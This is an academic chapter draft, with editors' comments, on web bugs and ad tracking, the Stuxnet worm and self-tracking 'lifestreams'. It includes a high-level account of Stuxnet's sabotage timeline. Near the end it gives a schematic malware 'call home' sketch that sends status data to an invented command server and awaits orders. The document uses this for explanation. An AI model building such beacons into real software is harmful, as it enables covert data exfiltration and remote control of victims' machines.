&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can, though, see in this context the current debate over the EU ePrivacy Directive: the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
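The 'do not track' flag itself is technically trivial, which makes the lack of compliance all the more striking: the browser simply attaches a DNT: 1 header to each request, and honouring it is left entirely to the server. A sketch of what voluntary compliance might look like (the functions and policy here are illustrative, not mandated behaviour): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Illustrative sketch of a server honouring the 'do not track' header.
# Nothing forces this branch to exist; compliance is voluntary (W3C, 2012).
def should_track(environ):
    # Browsers with the preference enabled send 'DNT: 1', which a WSGI
    # server exposes as the HTTP_DNT key in the request environment.
    return environ.get("HTTP_DNT") != "1"

def handle_request(environ):
    if should_track(environ):
        pass  # set cookies, fire beacons, log behavioural data ...
    # otherwise serve the page with no tracking side-effects
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;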
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of Americans said they would 'not be okay' with being tracked (because it would be an invasion of privacy)… Only 23 percent said they'd be 'okay' with tracking (because it would lead to better and more personalized search results)…Despite all those high-percentage objections to the idea of being tracked, less than half of the people surveyed -- 38 percent -- said they knew of ways to control the data collected about them. (Garber, 2012; Pew, 2012). &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are just not aware of the subterranean depths of their computational devices and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet worm, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system, which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behavior and therefore does not raise the alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
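Zetter's account can be read as a simple state machine that alternates long dormant periods with short excursions outside the safe frequency band. The following toy model merely restates that published timeline; it is not Stuxnet's actual logic, which ran as code on the Siemens controllers themselves: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Toy restatement of the attack rhythm described by Zetter (2011).
NOMINAL_HZ = 1064

def attack_cycle():
    """Yield (duration, frequency) steps of one full attack cycle."""
    yield ("27 days", NOMINAL_HZ)   # lie dormant, recording normal readings
    yield ("15 min", 1410)          # overspeed, near the IR-1 rotor limit
    yield ("27 days", NOMINAL_HZ)   # dormant again
    yield ("50 min", 2)             # underspeed, far below nominal
    # ...and repeat, replaying the recorded 'normal' sensor data to the
    # operators throughout (the man-in-the-middle disguise).

for duration, hz in attack_cycle():
    print(f"hold {hz} Hz for {duration}")
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;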
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have had to work on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality, it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) the capability to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures, and the second, larger warhead, 417, manipulated valves in the centrifuges and faked industrial process control sensor signals by modeling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan -&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and, in a very short time, learn techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years as ‘real-time streams’ platforms, like Twitter and Facebook, have expanded. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, with its short, text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect his data systematically. As he explains, he started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent, and in the context of reflexivity and self-knowledge it raises interesting questions. The data collected can also be relatively large in scale and unstructured. Nonetheless, better data management, together with techniques for searching and surfacing information from unstructured or semi-structured data, will no doubt prove revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
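By way of illustration, the following is a minimal sketch of how such patterns might be surfaced, assuming nothing more than a list of ISO-format timestamps (the data here is invented, and this is not Wolfram's own pipeline): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Surface a daily rhythm from timestamped events (e.g. emails or keystrokes).
# All data below is invented for illustration.
from collections import Counter
from datetime import datetime

events = ["2012-03-01T09:15:02", "2012-03-01T23:41:10", "2012-03-02T09:03:55"]

by_hour = Counter(datetime.fromisoformat(ts).hour for ts in events)
for hour in range(24):
    print("{:02d}:00 {}".format(hour, "#" * by_hour[hour]))
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;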
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check profiles and streams, and so on. When created as apps, however, they are also able to use the power of the local device - especially if it contains the kind of sophisticated sensory circuitry that is common in smartphones - to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard that is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams, n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
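Rendered concretely, such an activity is serialised as JSON. The following is a minimal sketch in Python; the names and URL are invented for illustration, though the fields (actor, verb, object, target) follow the JSON Activity Streams 1.0 draft (ActivityStreamsWG, 2011): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal JSON Activity Streams 1.0 activity: actor, verb, object, target.
import json

activity = {
    "published": "2012-03-04T12:00:00Z",
    "actor": {"objectType": "person", "displayName": "Geraldine"},
    "verb": "post",
    "object": {"objectType": "photo", "url": "http://example.org/photos/1.jpg"},
    "target": {"objectType": "photo-album", "displayName": "Holiday Album"},
}

print(json.dumps(activity, indent=2))  # ready to be transmitted and aggregated
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;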
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps and network graphs that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case - in other words, for the individual user (or lifestreamer) and for the organization (such as Facebook) - the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
&lt;br /&gt;
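A toy version of this comparison against a norm, assuming the individual's readings and a population baseline are simply available as lists (all numbers invented), might standardise the data as z-scores: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Compare an individual's readings against a population norm via z-scores.
from statistics import mean, stdev

population = [6.9, 7.2, 7.4, 6.8, 7.1, 7.3]  # e.g. hours of sleep per night
individual = [5.1, 6.0, 4.8]                 # the lifestreamer's recent data

mu, sigma = mean(population), stdev(population)
z_scores = [(x - mu) / sigma for x in individual]
print(z_scores)  # large magnitudes mark departures from the norm
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;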
The patterned usage therefore acts as a dynamic real-time feedback mechanism, providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally constructs a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives, providing a stabilisation of, and web of meaning for, the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software in order to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions. Yet users are actively downloading apps that advertise the fact that they collect this data, and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs, in many ways, are life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This class of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: both their passive quality - under the surface, relatively benign and silent - and the fact that they are aggressive in their hoarding of data - monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology, from the Latin for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data often generated, the computational processing and aggregation are frequently offloaded to the ‘cloud’ - server computers designed specifically for the task and accessed via networks. Indeed, many viruses seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
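Schematically, and without reproducing any real malware protocol, this 'call home' pattern amounts to little more than the following sketch (the endpoint and payload are entirely invented): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Schematic 'call home': a compactant reports its status to a remote server.
import json, urllib.request

status = {"agent": "example-01", "version": "1.0", "records_held": 128}
req = urllib.request.Request(
    "http://command.example.org/report",       # invented endpoint
    data=json.dumps(status).encode("utf-8"),
    headers={"Content-Type": "application/json"},
)
reply = urllib.request.urlopen(req).read()     # may carry an update or new orders
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;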
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative orientation toward a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard - what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems: time-series structured streams of real-time data, often organised as lists. The past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are therefore often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
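As a toy sketch of this temporal embedding, a stream can be held as a time-ordered list in which a single cut at 'now' separates the stored past from futural reminders (all entries invented): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A stream as a time-ordered list: past documents, present data, future reminders.
import bisect

stream = [  # (ISO timestamp, item), kept sorted by time
    ("2010-06-01T10:00", "photo uploaded"),         # past: stored data
    ("2012-03-04T09:00", "heart-rate sample"),      # present: current collection
    ("2012-03-05T08:00", "reminder: morning run"),  # future: ethical addressee
]

now = "2012-03-04T12:00"
cut = bisect.bisect(stream, (now,))   # index of the first future item
past, future = stream[:cut], stream[cut:]
print(past, future, sep="\n")
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;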
